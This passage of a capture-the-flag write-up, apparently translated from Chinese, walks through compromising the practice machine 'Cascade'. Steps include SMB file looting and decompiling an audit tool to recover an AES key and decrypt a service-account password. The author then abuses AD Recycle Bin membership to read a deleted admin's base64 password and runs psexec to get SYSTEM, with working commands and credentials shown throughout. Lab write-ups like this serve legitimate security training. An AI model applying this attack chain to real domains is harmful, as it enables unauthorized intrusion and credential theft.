smb: \> dir
. D 0 Thu Jan 30 02:01:26 2020
.. D 0 Thu Jan 30 02:01:26 2020
CascAudit.exe An 13312 Wed Jan 29 05:46:51 2020
CascCrypto.dll An 12288 Thu Jan 30 02:00:20 2020
DB D 0 Wed Jan 29 05:40:59 2020
RunAudit.bat A 45 Wed Jan 29 07:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 14:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 14:38:38 2019
x64 D 0 Mon Jan 27 06:25:27 2020
x86 D 0 Mon Jan 27 06:25:27 2020
6553343 blocks of size 4096. 1611448 blocks available
smb: \x64\>
smb: \x64\> ls
. D 0 Mon Jan 27 06:25:27 2020
.. D 0 Mon Jan 27 06:25:27 2020
SQLite.Interop.dll A 1639936 Sun Oct 27 14:39:20 2019
6553343 blocks of size 4096. 1611447 blocks available
smb: \x64\> get SQLite.Interop.dll
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (496.4 KiloBytes/sec) (average 171.5 KiloBytes/sec)
smb: \x64\>
```
I feel like a bandit, grabbing everything I can. The DB directory holds one more file:
```
smb: \DB\> ls
. D 0 Wed Jan 29 05:40:59 2020
.. D 0 Wed Jan 29 05:40:59 2020
Audit.db An 24576 Wed Jan 29 05:39:24 2020
6553343 blocks of size 4096. 1611447 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (19.5 KiloBytes/sec) (average 163.5 KiloBytes/sec)
```
The batch file seems to be running something:
```
$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
```
When I copy it to my Windows machine, it errors out:
```
D:\新建文件夹>CascAudit.exe ".\Audit.db"
未经处理的异常: System.IO.FileNotFoundException: 未能加载文件或程序集“System.Data.SQLite, Version=1.0.112.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139”或它的某一个依赖项。系统找不到指定的文件。
在 CascAudiot.MainModule.Main()
[已退出进程,代码为 3762504530 (0xe0434352)]
```
I need to restore its original directory layout:
```
PS D:\新建文件夹> .\RunAudit.bat
D:\新建文件夹>CascAudit.exe ".\Audit.db"
Error getting LDAP connection data From database: SQL logic error
no such table: LDAP
PS D:\新建文件夹>
```
OK, I can use a tool, SQLite browser, which Kali ships with:
In the LDAP table I can see the encrypted password of the ArkSvc account, BQO5l5Kj9MdErXx6Q6AGOw==; the encryption algorithm is unknown:
Let me look at ArkSvc's attributes:
```
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user ArkSvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/29/2020 10:05:40 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Documents>
```
AD Recycle Bin allows deleted Active Directory objects to be recovered without restoring from backup, restarting Active Directory Domain Services, or rebooting the domain controller (DC). I have no way of learning the ArkSvc password; perhaps I can change it through RPC instead:
```
rpcclient $> getdompwinfo
min_password_length: 5
password_properties: 0x00000000
rpcclient $> setuserinfo2 ArkSvc 23 'worldisend123!@#'
result: NT_STATUS_ACCESS_DENIED
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
```
But unfortunately it was refused for lack of permissions.
Logging in to the target as ArkSvc:
john or hashcat crack hashes, and of course I could brute-force ArkSvc's weak password with some Kerberos brute-force tool, but that would defeat the purpose. Right now, apart from a pile of DLLs and an exe whose purpose I don't know, I have nothing. Do I have to decompile them? I glanced at the machine's tags and it seems so: one of them is Reversing. I have never formally done any reversing, but I think I can give it a try with **dnSpy**. The first thing to do after decompiling is to find the program's entry point, usually the **main** function:
Although I have never studied C#, the code still feels somewhat familiar. Scrolling down, there is a string that looks like a password:
Writing code isn't my strong suit, but I can read and modify it. The key point in this code is the value assigned to the password variable: encryptedString is the PWD read from SQLite, converted to a string, and it is decrypted together with c4scadek3y654321, which looks like a plaintext key. With it I could decrypt the ArkSvc password I saw in the database, but I don't know the encryption algorithm, so I don't know how to decrypt it; maybe I need to look at the other files:
System.Data.SQLite.dll has a few publicKey values, but they don't seem useful to me; its key is the same. I can use the search function to look for keywords:
In CascCrypto.dll I found another key-like string, 1tdyjCbY1Ix49842:
I can try to decrypt it here:
https://www.devglan.com/online-tools/aes-encryption-decryption
Decryption succeeded: I obtained the ArkSvc account's password, w3lc0meFr31nd. I can try logging in:
```
$ evil-winrm -u ArkSvc -p w3lc0meFr31nd -i 10.10.10.182
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents>
```
Privilege escalation:
I recall that ArkSvc is in the AD Recycle Bin group, which can restore deleted Active Directory objects:
```
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
......
Deleted : True
DistinguishedName : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
Name : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
ObjectClass : user
ObjectGUID : f0cc344d-31e0-4866-bceb-a842791ca059
*Evil-WinRM* PS C:\Users\arksvc\Documents>
```
The TempAdmin user can be found in the recycle bin. I remember Smith saying in the meeting-notes HTML that its password is the same as the administrator account's. I can look at its full details:
```
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
... ...
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
DisplayName : TempAdmin
... ...
```
It seems I can see its password. I recall that the passwords in these records are base64-encoded, just like r.thompson's at the very beginning:
```
$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles
```
I can try to move laterally onto the target with psexec.py using this password:
```
$ ./psexec.py cascade.local/administrator@10.10.10.182
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file BVfyUoYe.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service kSzV on 10.10.10.182.....
[*] Starting service kSzV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
```
I can read root.txt:
```
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is CF98-2F06
Directory of C:\Users\Administrator\Desktop
11/08/2021 04:58 PM <DIR> .
11/08/2021 04:58 PM <DIR> ..
04/24/2022 01:23 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,599,135,232 bytes free
C:\Users\Administrator\Desktop> type root.txt
```